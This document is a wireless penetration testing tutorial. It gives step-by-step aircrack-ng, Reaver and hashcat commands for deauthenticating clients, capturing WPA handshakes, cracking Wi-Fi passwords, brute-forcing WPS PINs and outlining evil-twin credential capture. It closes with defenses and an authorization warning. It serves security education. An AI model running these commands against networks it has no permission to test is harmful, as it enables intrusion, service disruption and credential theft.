Wireless Network Penetration Testing Guide

Introduction to Wireless Security

Wireless networks present unique security challenges that differ from traditional wired networks. This comprehensive guide covers the essential techniques and tools for testing Wi-Fi security.

Required Tools

Essential tools for wireless penetration testing:

• Aircrack-ng suite: For packet capture and cracking
• Wireshark: For traffic analysis
• Reaver: For WPS attacks
• Wireless adapter with monitor mode support: Hardware requirement

Setting Up Your Environment

Prerequisites

# Install aircrack-ng suite
sudo apt update
sudo apt install aircrack-ng

# Verify your wireless adapter supports monitor mode
iwconfig
airmon-ng

Reconnaissance Phase

Start by putting your wireless adapter into monitor mode:

# Check current wireless interfaces
iwconfig

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0

# Verify monitor mode
iwconfig wlan0mon

Network Discovery

# Scan for wireless networks
sudo airodump-ng wlan0mon

# Focus on specific channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

WPA/WPA2 Testing

Capturing the Handshake

The four-way handshake is crucial for cracking WPA/WPA2:

# Terminal 1: Start capturing
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon

# Terminal 2: Deauthenticate a client to force handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

Password Cracking

# Use aircrack-ng with wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF wpa_capture-01.cap

# Or use hashcat for GPU acceleration
cap2hccapx wpa_capture-01.cap output.hccapx
hashcat -m 2500 output.hccapx rockyou.txt

WPS Attacks

WPS (Wi-Fi Protected Setup) can be vulnerable to brute-force attacks:

# Check for WPS-enabled networks
sudo wash -i wlan0mon

# Launch WPS PIN attack with Reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Evil Twin Attacks

Create a rogue access point to capture credentials:

# Install hostapd and dnsmasq
sudo apt install hostapd dnsmasq

# Configure fake AP
# Edit /etc/hostapd/hostapd.conf
# Launch attack with airbase-ng or hostapd

Traffic Analysis

Capturing and Analyzing Traffic

# Capture packets
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Analyze with Wireshark
wireshark capture-01.cap

# Filter for interesting traffic
# HTTP, FTP, Telnet, etc.

Defense Strategies

Protect your wireless network from these attacks:

• Use WPA3 encryption when available
• Create strong, complex passwords (minimum 12 characters)
• Disable WPS if not needed
• Hide SSID (security through obscurity)
• Enable MAC filtering as an additional layer
• Regular firmware updates
• Use VPN for sensitive communications
• Network segmentation (guest network separate from main network)

Advanced Techniques

Custom Wordlist Generation

# Use crunch for pattern-based wordlists
crunch 8 12 -t password@@@ > custom.txt

# Use cewl to scrape website for keywords
cewl https://target.com -w wordlist.txt

Rule-Based Attacks

# Use hashcat rules
hashcat -m 2500 capture.hccapx wordlist.txt -r rules/best64.rule

Legal and Ethical Considerations

Important: Only test wireless networks you own or have explicit written permission to test. Unauthorized wireless network testing is illegal in most jurisdictions.

Always:

• Get written authorization
• Document your scope of work
• Report findings professionally
• Secure any captured data
• Follow responsible disclosure practices

Conclusion

Wireless penetration testing is an essential skill for security professionals. Practice these techniques in controlled environments like your own lab or authorized CTF platforms before attempting real-world assessments.

Remember that strong security comes from layers of defense, not just a single measure.